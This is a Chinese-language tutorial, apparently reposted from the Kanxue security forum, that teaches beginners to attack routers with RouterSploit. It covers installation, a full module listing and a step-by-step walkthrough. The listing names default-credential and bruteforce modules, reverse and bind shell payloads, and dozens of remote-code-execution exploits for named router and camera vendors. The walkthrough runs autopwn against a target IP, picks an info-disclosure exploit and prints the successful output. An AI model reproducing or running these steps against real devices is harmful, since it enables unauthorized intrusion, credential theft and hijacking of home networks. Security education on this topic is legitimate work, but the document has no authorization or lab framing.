使用RouterSploit攻击路由器的方法介绍

路由器是网络连接的核心设备，但是普通用户并不会太注意路由器的安全配置问题。老的设备固件系统，默认弱口令密码和其他配置问题都会被黑客利用。而且这些利用漏洞非常简单，以至于创建自动化工具来利用这些漏洞就变得轻而易举。

在这篇文章中，我会讲述如何使用RouterSploit，这是一种自动化路由器漏洞利用工具。

路由器漏洞利用的基础知识

路由器漏洞利用的原理是破坏路由器的Wi-Fi安全性，绕过管理登录页面和访问管理功能。然后，熟练的攻击者可以在“rootkitting”中定位路由器的固件信息，其中自定义的固件信息可以被用于高级恶意功能。

根据攻击者的攻击目标分析，攻击可能包括监视用户和连接的设备，将恶意软件注入Web管理中以利用连接的设备，实现高级鱼叉式网络钓鱼攻击，并通过被利用的路由器为非法流量路由提供犯罪活动。

Cherry Blossom路由器漏洞利用工具

美国国家安全局和中央情报局等政府机构对路由器漏洞进行了囤积，ShadowBrokers在Window SMB漏洞被利用于WanaCry病毒之后发布这些路由器漏洞。现在像Cherry Blossom这样的工具在以后可能会成为路由器漏洞主流工具。

NSA和CIA的这些工具可以控制受感染路由器所在的整个局域网络，可以将它们转换为先进的无线间谍设备。

Cherry Blossom是一个rootkitting框架，其中路由器被自动利用并转换为“flytraps”。 flytraps 是一种被使用特殊固件更新的路由器，可以防止用户更新或修改新固件，被黑客广泛使用。

Cherry Blossom路由器漏洞利用工具可以控制许多“ flytraps （ 捕蝇草 ）”，称为访问位于家中或目标网络中的间谍设备。 

flytraps （ 捕蝇草 ）将“ beacon ”回连到“Cherryweb”的命令和控制服务器，然后由操作者通过加密的VPN隧道分配“任务”。高级模块下，比如“Windex”，可以对任何连接的目标执行恶意软件攻击，可以将 flytraps （捕蝇草） 变成一个能够从任何地方进行控制的高级远程间谍平台。 

如图是Cherry Blossom显示要发送到 flytraps （捕蝇草） 设备的任务命令，包括shell代码，侦察脚本和漏洞利用代码

路由器黑客攻击活动

除了CIA关注的间谍工具之外，可以被利用的路由器和物联网设备因其路由能力而成为重要目标。RouterSploit，今天要使用的工具，不仅可以攻击路由器，它还可以用于网络摄像头和其他连接设备。

虽然CIA使用VPN连接来分析和控制服务器之间的流量，但网络犯罪分子将使用这些设备代理恶意流量以避免检测。实际上，这些被感染的路由器和物联网设备的网络作为代理攻击工具在黑市被出售，用于隐藏信用卡盗窃，暗网交易和DDoS攻击等非法活动。

路由器黑客攻击实战入门

如果拿到路由器的控制权，你将拥有对网络的完全访问权限。你可以控制目标设备的网络状况并将其路由到你想要的任何地或任何地方，或转发端口以进行远程访问。

初学者只需在RouterSploit上运行Autopwn扫描程序，也会自动检测出针对目标IP地址的一系列漏洞。

什么是RouterSploit？

RouterSploit是一个用Python写的框架，可以自动完成与路由器相关的大多数漏洞利用任务。它以Metasploit为模型，任何习惯Metasploit框架的人都会熟悉它的命令。它包含扫描和利用模块，可用于Kali Linux安装下载

与目标网络联网后，扫描后将显示是否可以通过框架轻松利用路由器，我将通过Autopwn功能快速识别路由器和连接设备上的漏洞。

安装准备

RouterSploit可以在Kali Linux下安装，也可以在Kali Raspberry Pi，macOS或Mac OS X，Windows上运行，甚至可以在root后的Android手机上运行。首先，我们需要处理一些依赖项并确保安装了Python。

第1步：安装Python和依赖项

需要确保安装了Python，并且您还需要以下一些软件包。

Python3 (with pip)RequestsParamikoBeautifulsoup4PysnmpGnureadline (macOS / Mac OS X only)

你可以使用apt-get安装它们：

apt-get install python3-pip requests paramiko beautifulsoup4 pysnmp

第2步：在Mac，Kali上安装RouterSploit

要在Kali Linux上安装，请打开终端窗口并键入以下命令：

git clone https://github.com/threat9/routersploitcd routersploitpython3 -m pip install -r requirements.txtpython3 rsf.py

在macOS或Mac OS X上，方法类似。在终端窗口中，键入： 

git clone https://github.com/threat9/routersploitcd routersploitsudo easy_install pipsudo pip install -r requirements.txt

第3步：运行RouterSploit

首次运行请将计算机连接到有你要扫描的路由器的网络中，导航到RouterSploit文件夹并通过键入以下命令运行RouterSploit。

cdcd routersploitsudo python ./rsf.py

RouterSploit框架界面风格和Metasploit框架很相似

命令行界面可以输入简单的命令来扫描和利用路由器漏洞，可以通过键入以下命令查看RouterSploit提供的所有功能： 

show all

下面的输出中看到的有很多漏洞利用代码和扫描脚本

creds/generic/snmp_bruteforcecreds/generic/telnet_defaultcreds/generic/ssh_defaultcreds/generic/ftp_bruteforcecreds/generic/http_basic_digest_bruteforcecreds/generic/ftp_defaultcreds/generic/http_basic_digest_defaultcreds/generic/ssh_bruteforcecreds/generic/telnet_bruteforcecreds/routers/ipfire/ssh_default_credscreds/routers/ipfire/telnet_default_credscreds/routers/ipfire/ftp_default_credscreds/routers/bhu/ssh_default_credscreds/routers/bhu/telnet_default_credscreds/routers/bhu/ftp_default_credscreds/routers/linksys/ssh_default_credscreds/routers/linksys/telnet_default_credscreds/routers/linksys/ftp_default_credscreds/routers/technicolor/ssh_default_credscreds/routers/technicolor/telnet_default_credscreds/routers/technicolor/ftp_default_credscreds/routers/asus/ssh_default_credscreds/routers/asus/telnet_default_credscreds/routers/asus/ftp_default_credscreds/routers/billion/ssh_default_credscreds/routers/billion/telnet_default_credscreds/routers/billion/ftp_default_credscreds/routers/zte/ssh_default_credscreds/routers/zte/telnet_default_credscreds/routers/zte/ftp_default_credscreds/routers/ubiquiti/ssh_default_credscreds/routers/ubiquiti/telnet_default_credscreds/routers/ubiquiti/ftp_default_credscreds/routers/asmax/ssh_default_credscreds/routers/asmax/telnet_default_credscreds/routers/asmax/ftp_default_credscreds/routers/asmax/webinterface_http_auth_default_credscreds/routers/huawei/ssh_default_credscreds/routers/huawei/telnet_default_credscreds/routers/huawei/ftp_default_credscreds/routers/tplink/ssh_default_credscreds/routers/tplink/telnet_default_credscreds/routers/tplink/ftp_default_credscreds/routers/netgear/ssh_default_credscreds/routers/netgear/telnet_default_credscreds/routers/netgear/ftp_default_credscreds/routers/mikrotik/ssh_default_credscreds/routers/mikrotik/telnet_default_credscreds/routers/mikrotik/ftp_default_credscreds/routers/mikrotik/api_ros_default_credscreds/routers/movistar/ssh_default_credscreds/routers/movistar/telnet_default_credscreds/routers/movistar/ftp_default_credscreds/routers/dlink/ssh_default_credscreds/routers/dlink/telnet_default_credscreds/routers/dlink/ftp_default_credscreds/routers/juniper/ssh_default_credscreds/routers/juniper/telnet_default_credscreds/routers/juniper/ftp_default_credscreds/routers/comtrend/ssh_default_credscreds/routers/comtrend/telnet_default_credscreds/routers/comtrend/ftp_default_credscreds/routers/fortinet/ssh_default_credscreds/routers/fortinet/telnet_default_credscreds/routers/fortinet/ftp_default_credscreds/routers/belkin/ssh_default_credscreds/routers/belkin/telnet_default_credscreds/routers/belkin/ftp_default_credscreds/routers/netsys/ssh_default_credscreds/routers/netsys/telnet_default_credscreds/routers/netsys/ftp_default_credscreds/routers/pfsense/ssh_default_credscreds/routers/pfsense/webinterface_http_form_default_credscreds/routers/zyxel/ssh_default_credscreds/routers/zyxel/telnet_default_credscreds/routers/zyxel/ftp_default_credscreds/routers/thomson/ssh_default_credscreds/routers/thomson/telnet_default_credscreds/routers/thomson/ftp_default_credscreds/routers/netcore/ssh_default_credscreds/routers/netcore/telnet_default_credscreds/routers/netcore/ftp_default_credscreds/routers/cisco/ssh_default_credscreds/routers/cisco/telnet_default_credscreds/routers/cisco/ftp_default_credscreds/cameras/grandstream/ssh_default_credscreds/cameras/grandstream/telnet_default_credscreds/cameras/grandstream/ftp_default_credscreds/cameras/basler/ssh_default_credscreds/cameras/basler/webinterface_http_form_default_credscreds/cameras/basler/telnet_default_credscreds/cameras/basler/ftp_default_credscreds/cameras/avtech/ssh_default_credscreds/cameras/avtech/telnet_default_credscreds/cameras/avtech/ftp_default_credscreds/cameras/vacron/ssh_default_credscreds/cameras/vacron/telnet_default_credscreds/cameras/vacron/ftp_default_credscreds/cameras/acti/ssh_default_credscreds/cameras/acti/webinterface_http_form_default_credscreds/cameras/acti/telnet_default_credscreds/cameras/acti/ftp_default_credscreds/cameras/sentry360/ssh_default_credscreds/cameras/sentry360/telnet_default_credscreds/cameras/sentry360/ftp_default_credscreds/cameras/siemens/ssh_default_credscreds/cameras/siemens/telnet_default_credscreds/cameras/siemens/ftp_default_credscreds/cameras/american_dynamics/ssh_default_credscreds/cameras/american_dynamics/telnet_default_credscreds/cameras/american_dynamics/ftp_default_credscreds/cameras/videoiq/ssh_default_credscreds/cameras/videoiq/telnet_default_credscreds/cameras/videoiq/ftp_default_credscreds/cameras/jvc/ssh_default_credscreds/cameras/jvc/telnet_default_credscreds/cameras/jvc/ftp_default_credscreds/cameras/speco/ssh_default_credscreds/cameras/speco/telnet_default_credscreds/cameras/speco/ftp_default_credscreds/cameras/iqinvision/ssh_default_credscreds/cameras/iqinvision/telnet_default_credscreds/cameras/iqinvision/ftp_default_credscreds/cameras/avigilon/ssh_default_credscreds/cameras/avigilon/telnet_default_credscreds/cameras/avigilon/ftp_default_credscreds/cameras/canon/ssh_default_credscreds/cameras/canon/telnet_default_credscreds/cameras/canon/ftp_default_credscreds/cameras/canon/webinterface_http_auth_default_credscreds/cameras/hikvision/ssh_default_credscreds/cameras/hikvision/telnet_default_credscreds/cameras/hikvision/ftp_default_credscreds/cameras/dlink/ssh_default_credscreds/cameras/dlink/telnet_default_credscreds/cameras/dlink/ftp_default_credscreds/cameras/honeywell/ssh_default_credscreds/cameras/honeywell/telnet_default_credscreds/cameras/honeywell/ftp_default_credscreds/cameras/samsung/ssh_default_credscreds/cameras/samsung/telnet_default_credscreds/cameras/samsung/ftp_default_credscreds/cameras/axis/ssh_default_credscreds/cameras/axis/telnet_default_credscreds/cameras/axis/ftp_default_credscreds/cameras/axis/webinterface_http_auth_default_credscreds/cameras/arecont/ssh_default_credscreds/cameras/arecont/telnet_default_credscreds/cameras/arecont/ftp_default_credscreds/cameras/brickcom/ssh_default_credscreds/cameras/brickcom/telnet_default_credscreds/cameras/brickcom/ftp_default_credscreds/cameras/brickcom/webinterface_http_auth_default_credscreds/cameras/mobotix/ssh_default_credscreds/cameras/mobotix/telnet_default_credscreds/cameras/mobotix/ftp_default_credscreds/cameras/geovision/ssh_default_credscreds/cameras/geovision/telnet_default_credscreds/cameras/geovision/ftp_default_credscreds/cameras/stardot/ssh_default_credscreds/cameras/stardot/telnet_default_credscreds/cameras/stardot/ftp_default_credscreds/cameras/cisco/ssh_default_credscreds/cameras/cisco/telnet_default_credscreds/cameras/cisco/ftp_default_credspayloads/perl/bind_tcppayloads/perl/reverse_tcppayloads/python/bind_tcppayloads/python/reverse_tcppayloads/python/bind_udppayloads/python/reverse_udppayloads/mipsbe/bind_tcppayloads/mipsbe/reverse_tcppayloads/armle/bind_tcppayloads/armle/reverse_tcppayloads/x86/bind_tcppayloads/x86/reverse_tcppayloads/php/bind_tcppayloads/php/reverse_tcppayloads/cmd/php_reverse_tcppayloads/cmd/python_reverse_tcppayloads/cmd/python_bind_tcppayloads/cmd/perl_reverse_tcppayloads/cmd/netcat_reverse_tcppayloads/cmd/awk_reverse_tcppayloads/cmd/awk_bind_tcppayloads/cmd/bash_reverse_tcppayloads/cmd/php_bind_tcppayloads/cmd/awk_bind_udppayloads/cmd/netcat_bind_tcppayloads/cmd/perl_bind_tcppayloads/cmd/python_reverse_udppayloads/cmd/python_bind_udppayloads/x64/bind_tcppayloads/x64/reverse_tcppayloads/mipsle/bind_tcppayloads/mipsle/reverse_tcpscanners/autopwnscanners/misc/misc_scanscanners/routers/router_scanscanners/cameras/camera_scanexploits/generic/shellshockexploits/generic/ssh_auth_keysexploits/generic/heartbleedexploits/misc/asus/b1m_projector_rceexploits/misc/wepresent/wipg1000_rceexploits/misc/miele/pg8528_path_traversalexploits/routers/ipfire/ipfire_oinkcode_rceexploits/routers/ipfire/ipfire_proxy_rceexploits/routers/ipfire/ipfire_shellshockexploits/routers/2wire/gateway_auth_bypassexploits/routers/2wire/4011g_5012nv_path_traversalexploits/routers/bhu/bhu_urouter_rceexploits/routers/linksys/1500_2500_rceexploits/routers/linksys/smartwifi_password_disclosureexploits/routers/linksys/wrt100_110_rceexploits/routers/linksys/wap54gv3_rceexploits/routers/technicolor/tg784_authbypassexploits/routers/technicolor/tc7200_password_disclosure_v2exploits/routers/technicolor/dwg855_authbypassexploits/routers/technicolor/tc7200_password_disclosureexploits/routers/asus/infosvr_backdoor_rceexploits/routers/asus/rt_n16_password_disclosureexploits/routers/billion/billion_5200w_rceexploits/routers/billion/billion_7700nr4_password_disclosureexploits/routers/zte/f460_f660_backdoorexploits/routers/zte/zxv10_rceexploits/routers/ubiquiti/airos_6_xexploits/routers/asmax/ar_1004g_password_disclosureexploits/routers/asmax/ar_804_gu_rceexploits/routers/huawei/hg520_info_dislosureexploits/routers/huawei/hg866_password_changeexploits/routers/huawei/hg530_hg520b_password_disclosureexploits/routers/huawei/e5331_mifi_info_disclosureexploits/routers/tplink/wdr740nd_wdr740n_backdoorexploits/routers/tplink/archer_c2_c20i_rceexploits/routers/tplink/wdr740nd_wdr740n_path_traversalexploits/routers/tplink/wdr842nd_wdr842n_configure_disclosureexploits/routers/netgear/jnr1010_path_traversalexploits/routers/netgear/n300_auth_bypassexploits/routers/netgear/multi_password_disclosure-2017-5521exploits/routers/netgear/dgn2200_dnslookup_cgi_rceexploits/routers/netgear/prosafe_rceexploits/routers/netgear/r7000_r6400_rceexploits/routers/netgear/multi_rceexploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversalexploits/routers/netgear/dgn2200_ping_cgi_rceexploits/routers/mikrotik/routeros_jailbreakexploits/routers/movistar/adsl_router_bhs_rta_path_traversalexploits/routers/dlink/dsp_w110_rceexploits/routers/dlink/dgs_1510_add_userexploits/routers/dlink/dir_645_815_rceexploits/routers/dlink/dir_815_850l_rceexploits/routers/dlink/dir_300_320_615_auth_bypassexploits/routers/dlink/dir_645_password_disclosureexploits/routers/dlink/dir_850l_creds_disclosureexploits/routers/dlink/dvg_n5402sp_path_traversalexploits/routers/dlink/dsl_2640b_dns_changeexploits/routers/dlink/dcs_930l_auth_rceexploits/routers/dlink/dir_825_path_traversalexploits/routers/dlink/multi_hedwig_cgi_execexploits/routers/dlink/dns_320l_327l_rceexploits/routers/dlink/dsl_2730_2750_path_traversalexploits/routers/dlink/dsl_2750b_info_disclosureexploits/routers/dlink/dir_300_600_rceexploits/routers/dlink/dwl_3200ap_password_disclosureexploits/routers/dlink/dsl_2740r_dns_changeexploits/routers/dlink/dir_8xx_password_disclosureexploits/routers/dlink/dwr_932b_backdoorexploits/routers/dlink/dsl_2730b_2780b_526b_dns_changeexploits/routers/dlink/dwr_932_info_disclosureexploits/routers/dlink/dir_300_320_600_615_info_disclosureexploits/routers/dlink/dsl_2750b_rceexploits/routers/dlink/multi_hnap_rceexploits/routers/dlink/dir_300_645_815_upnp_rceexploits/routers/3com/ap8760_password_disclosureexploits/routers/3com/imc_path_traversalexploits/routers/3com/officeconnect_rceexploits/routers/3com/officeconnect_info_disclosureexploits/routers/3com/imc_info_disclosureexploits/routers/comtrend/ct_5361t_password_disclosureexploits/routers/fortinet/fortigate_os_backdoorexploits/routers/multi/rom0exploits/routers/multi/tcp_32764_rceexploits/routers/multi/misfortune_cookieexploits/routers/multi/tcp_32764_info_disclosureexploits/routers/multi/gpon_home_gateway_rceexploits/routers/belkin/g_plus_info_disclosureexploits/routers/belkin/play_max_prceexploits/routers/belkin/n150_path_traversalexploits/routers/belkin/n750_rceexploits/routers/belkin/g_n150_password_disclosureexploits/routers/belkin/auth_bypassexploits/routers/netsys/multi_rceexploits/routers/shuttle/915wm_dns_changeexploits/routers/zyxel/d1000_rceexploits/routers/zyxel/p660hn_t_v2_rceexploits/routers/zyxel/d1000_wifi_password_disclosureexploits/routers/zyxel/zywall_usg_extract_hashesexploits/routers/zyxel/p660hn_t_v1_rceexploits/routers/thomson/twg850_password_disclosureexploits/routers/thomson/twg849_info_disclosureexploits/routers/netcore/udp_53413_rceexploits/routers/cisco/secure_acs_bypassexploits/routers/cisco/catalyst_2960_rocemexploits/routers/cisco/ucs_manager_rceexploits/routers/cisco/unified_multi_path_traversalexploits/routers/cisco/firepower_management60_path_traversalexploits/routers/cisco/firepower_management60_rceexploits/routers/cisco/video_surv_path_traversalexploits/routers/cisco/dpc2420_info_disclosureexploits/routers/cisco/ios_http_authorization_bypassexploits/routers/cisco/ucm_info_disclosureexploits/cameras/grandstream/gxv3611hd_ip_camera_sqliexploits/cameras/grandstream/gxv3611hd_ip_camera_backdoorexploits/cameras/mvpower/dvr_jaws_rceexploits/cameras/siemens/cvms2025_credentials_disclosureexploits/cameras/avigilon/videoiq_camera_path_traversalexploits/cameras/xiongmai/uc_httpd_path_traversalexploits/cameras/dlink/dcs_930l_932l_auth_bypassexploits/cameras/honeywell/hicc_1100pt_password_disclosureexploits/cameras/brickcom/corp_network_cameras_conf_disclosureexploits/cameras/brickcom/users_cgi_creds_disclosureexploits/cameras/multi/P2P_wificam_credential_disclosureexploits/cameras/multi/dvr_creds_disclosureexploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversalexploits/cameras/multi/netwave_ip_camera_information_disclosureexploits/cameras/multi/P2P_wificam_rcegeneric/bluetooth/btle_enumerategeneric/bluetooth/btle_scangeneric/bluetooth/btle_writegeneric/upnp/ssdp_msearchrsf >

首先将开始对目标路由器进行扫描，将检查路由器的每个漏洞是否可以被利用，它将在扫描结束时返回一个列表，其中包含对目标有效的每个漏洞。

第4步：扫描目标

我们将使用Autopwn扫描程序查找适用于我们目标的任何漏洞，找到路由器的IP地址并保存下来，大多数情况下，路由器的默认IP为192.168.0.1，但这可以改，如果你不知道，可以使用Fing或ARP扫描查找IP地址。

启动RouterSploit后，键入以下命令进入Autopwn模块：

use scanners/autopwnshow options

这与Metasploit非常相似。键入use，然后键入要使用的模块，显示选项以显示你选择的模块的变量，设置为从show options命令中看到的任何变量，最后运行以执行模块。要关闭模块并转到主屏幕，键入exit。 

rsf > use scanners/autopwnrsf (AutoPwn) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target IPv4 or IPv6 address Module options: Name Current settings Description ---- ---------------- ----------- http_port 80 Target Web Interface Port http_ssl false HTTPS enabled: true/false ftp_port 21 Target FTP port (default: 21) ftp_ssl false FTPS enabled: true/false ssh_port 22 Target SSH port (default: 22) telnet_port 23 Target Telnet port (default: 23) threads 8

在这种情况下，我们将目标设置为路由器的IP地址。键入set target，然后键入路由器的IP地址，然后按enter键。最后，键入run以开始扫描。 

rsf (AutoPwn) > set target 10.11.0.4 [+] {target: 10.11.0.4}rsf (AutoPwn) > run

第5步：选择和配置EXP

扫描完成后，将显示它找到的漏洞列表，可以从此列表中选择最适合我们需求的漏洞。在这里，我们看到一个具有许多漏洞的路由器。

[*] Elapsed time: ``9. seconds [*] Could not verify exploitability: - exploits/routers/billion/5200w_rce - exploits/routers/cisco/catalyst_2960_rocem - exploits/routers/cisco/secure_acs_bypass - exploits/routers/dlink/dir_815_8501_rce - exploits/routers/dlink/dsl_2640b_dns_change - exploits/routers/dlink/dsl_2730b_2780b_526_dns_change - exploits/routers/dlink/dsl_2740r_dns_change - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce - exploits/routers/shuttle/915wm_dns_change [*] Device is vulnerable: - exploits/routers/3com/3crads172_info_disclosure - exploits/routers/3com/officialconnect_rce - exploits/routers/dlink/dcs_9301_auto_rce - exploits/routers/dlink/dir_300_600_rce - exploits/routers/ipfire/ipfire_proxy_rce - exploits/routers/linksys/1500_2500_rce - exploits/routers/netgear/prosafe_rce - exploits/routers/zyxel/zywall_usg_extract_hashes - exploits/routers/dlink/dcs_9301_9321_authbypass rsf (AutoPwn) >

可以从一些简单的漏洞利用开始，比如信息泄露。要使用此漏洞，输入以下命令。 

use exploits/routers/3com/3cradsl72_info_disclosureshow options

将出现一个变量列表，可以通过键入以下内容来设置目标：

set target <target router IP>check

设置目标IP

rsf (AutoPwn) > use exploits/routers/3com/3cradsl72_info_disclosureshow optionsrsf (3Com 3CRADSL72 Info Disclosure) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target IPv4 or IPv6 address rsf (3Com 3CRADSL72 Info Disclosure) > set target 10.11.0.4 [+] {target: 10.11.0.4}rsf (3Com 3CRADSL72 Info Disclosure) > check/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning) [+] Target is vulnerablersf (3Com 3CRADSL72 Info Disclosure) >

第6步：运行漏洞利用代码

输入run,进行攻击：

rsf (3Com 3CRADSL72 Info Disclosure) > run [*] Running module... [*] Sending request to download sensitive information/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate #ssl-warnings InsecureRequestWarning) [+] Exploit success [*] Reading /app_sta.stm file<!doctype html><html ><!-- _#####____####___######___####___####___##______######__#####___##__##__##__##__##______##_____##______##______##______##__##__#####___######__####_____####___####___##______####____#####___##______##__##__##__________##_____##__##______##______##__##__##______##__##__######___####___####___######__######__##__##_ We are hiring software developers! --><head> <link rel="manifest" href="/public/manifest.json.htm"> <meta httlp-equiv="X-UA-Compatible" content="IE-edge,chrome=1"> <meta name="viewport" content="width=device-width.initial-scale">

如果漏洞利用成功，你应该会看到内部配置设置，这些设置可能会泄漏用户的登录名和密码，默认密码和设备序列号，以及其他允许破坏路由器的设置。其他模块可以远程注入代码或直接拿到 路由器密码。

- End -

看雪ID：hackerbirder     

本文由看雪论坛 hackerbirder 原创

转载请注明来自看雪社区

热门图书推荐 广告

加密与解密（第4版）

作者：段钢

当当   购买

戳 立即购买！

热门文章阅读

1、GandCrab V2.0 详细分析

2、SSDT-HOOK

3、一篇文章带你理解PE三表

ID：ikanxue

官方微博：看雪安全

商务合作：[email protected]

↙点击下方“阅读原文”，查看更多干货